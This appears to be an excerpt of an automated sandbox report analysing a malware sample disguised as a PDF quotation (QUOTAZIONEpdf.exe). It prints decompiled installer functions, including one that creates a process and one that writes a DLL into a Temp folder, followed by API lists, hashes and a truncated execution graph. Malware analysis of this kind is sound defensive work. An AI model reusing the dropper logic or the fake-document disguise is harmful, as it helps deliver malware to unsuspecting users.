                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004052E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                0x004052ee
                0x0040530a
                0x00405312
                0x00405317
                0x00000000
                0x0040531d
                0x00405321

                APIs
                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                • CloseHandle.KERNEL32(?), ref: 00405317
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                • Error launching installer, xrefs: 004052F8
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                • API String ID: 3712363035-2984075973
                • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405578, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                0x00405579
                0x00405590
                0x00405598
                0x00405598
                0x004055a0

                APIs
                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 2659869361-3916508600
                • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                0x00401ec7
                0x00401ecf
                0x00401ed4
                0x00401ed9
                0x00401edd
                0x00401ee0
                0x00401ee2
                0x00401ee9
                0x00401ef2
                0x00401efa
                0x00401efd
                0x00401f12
                0x00401f18
                0x00401f2b
                0x00401f34
                0x00401f40
                0x00401f45
                0x00401f45
                0x00401f2b
                0x00401f48
                0x00401b75
                0x00401b75
                0x00401efd
                0x00402880
                0x0040288c

                APIs
                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                  • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                • String ID:
                • API String ID: 1404258612-0
                • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                0x00401d29
                0x00401d42
                0x00401d4c
                0x00401d51
                0x00401d5c
                0x00401d63
                0x00401d75
                0x00401d7b
                0x00401d80
                0x00401d8a
                0x004024aa
                0x00401561
                0x00402825
                0x00402880
                0x0040288c

                APIs
                • GetDC.USER32(?), ref: 00401D22
                • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CapsCreateDeviceFontIndirect
                • String ID:
                • API String ID: 3272661963-0
                • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403897, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                0x0040389b
                0x004038a0
                0x004038a6
                0x004038ab
                0x004038ab
                0x004038b3
                0x00000000
                0x00000000
                0x004038bb
                0x004038c3
                0x004038c5
                0x004038cb
                0x004038cb
                0x004038cd
                0x004038d9
                0x00000000
                0x00000000
                0x004038dd
                0x00000000
                0x00000000
                0x00000000
                0x004038df
                0x004038e4
                0x004038ed
                0x004038f3
                0x004038f8
                0x0040390c
                0x00403917
                0x0040392f
                0x00403935
                0x0040393a
                0x00403942
                0x00403963
                0x00403963
                0x00403963
                0x00403944
                0x00403946
                0x00403946
                0x0040394a
                0x00403951
                0x00403951
                0x00403956
                0x0040395c
                0x0040395c
                0x00000000
                0x00403946
                0x004038fa
                0x004038ff
                0x00403908
                0x00403901
                0x00403901
                0x00403901
                0x004038ff

                APIs
                • SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: TextWindow
                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                • API String ID: 530164218-1075807775
                • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404D73, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}




                0x00404d7f
                0x00404da4
                0x00404dc4
                0x00404dc7
                0x00404dca
                0x00404de1
                0x00404de7
                0x00404dee
                0x00404df5
                0x00404dfc
                0x00404e01
                0x00404e07
                0x00000000
                0x00404e17
                0x00404db1
                0x00404e04
                0x00404e04
                0x00000000
                0x00404e04
                0x00404dbd
                0x00404dbf
                0x00000000
                0x00404dbf
                0x00404d85
                0x00000000
                0x00000000
                0x00404d8c
                0x00000000

                APIs
                • IsWindowVisible.USER32 ref: 00404DA9
                • CallWindowProcA.USER32 ref: 00404E17
                  • Part of subcall function 00403E83: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E95
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                0x004024b0
                0x004024b0
                0x004024b3
                0x004024ce
                0x004024b5
                0x004024b7
                0x004024bc
                0x004024c3
                0x004024d5
                0x0040264e
                0x0040264e
                0x004024db
                0x004024ed
                0x004015a6
                0x004015a8
                0x00000000
                0x004015ae
                0x004015a8
                0x00402880
                0x0040288c

                APIs
                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                Strings
                • C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll, xrefs: 004024BC, 004024E1
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: FileWritelstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll
                • API String ID: 427699356-525533019
                • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004055BF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                0x004055c0
                0x004055ca
                0x004055cc
                0x004055d3
                0x004055db
                0x00000000
                0x00000000
                0x00000000
                0x004055db
                0x004055dd
                0x004055e2

                APIs
                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,80000000,00000003), ref: 004055C5
                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,80000000,00000003), ref: 004055D3
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-1669384263
                • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004056D1, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                0x004056dd
                0x004056df
                0x00405707
                0x004056ec
                0x004056f1
                0x004056fc
                0x00000000
                0x00405719
                0x00405705
                0x00405705
                0x00000000

                APIs
                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: QUOTAZIONEpdf.exe PID: 808 Parent PID: 6352 QUOTAZIONEpdf.exeCOMMON

                Execution Graph

                Execution Coverage:31.3%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:2.3%
                Total number of Nodes:1846
                Total number of Limit Nodes:92

                Graph

                execution_graph 9702 40c640 9729 404bee 9702->9729 9705 40c70f 9706 404bee 6 API calls 9707 40c66b 9706->9707 9708 404bee 6 API calls 9707->9708 9713 40c708 9707->9713 9710 40c683 9708->9710 9709 402bab 2 API calls 9709->9705 9711 404bee 6 API calls 9710->9711 9717 40c701 9710->9717 9716 40c694 9711->9716 9712 402bab 2 API calls 9712->9713 9713->9709 9714 40c6f8 9715 402bab 2 API calls 9714->9715 9715->9717 9716->9714 9736 40c522 9716->9736 9717->9712 9719 40c6a9 9720 40c6ef 9719->9720 9722 405872 4 API calls 9719->9722 9721 402bab 2 API calls 9720->9721 9721->9714 9723 40c6c5 9722->9723 9724 405872 4 API calls 9723->9724 9725 40c6d5 9724->9725 9726 405872 4 API calls 9725->9726 9727 40c6e7 9726->9727 9728 402bab 2 API calls 9727->9728 9728->9720 9730 402b7c 2 API calls 9729->9730 9731 404bff 9730->9731 9732 4031e5 4 API calls 9731->9732 9735 404c3b 9731->9735 9733 404c28 9732->9733 9734 402bab 2 API calls 9733->9734 9733->9735 9734->9735 9735->9705 9735->9706 9737 402b7c 2 API calls 9736->9737 9738 40c542 9737->9738 9738->9719 9739 405941 9740 4031e5 4 API calls 9739->9740 9741 405954 9740->9741 8306 409046 8319 413b28 8306->8319 8308 40906d 8310 405b6f 6 API calls 8308->8310 8309 40904e 8309->8308 8311 403fbf 7 API calls 8309->8311 8312 40907c 8310->8312 8311->8308 8313 409092 8312->8313 8323 409408 8312->8323 8315 4090a3 8313->8315 8318 402bab 2 API calls 8313->8318 8317 402bab 2 API calls 8317->8313 8318->8315 8320 413b31 8319->8320 8321 413b38 8319->8321 8322 404056 6 API calls 8320->8322 8321->8309 8322->8321 8324 409413 8323->8324 8325 40908c 8324->8325 8337 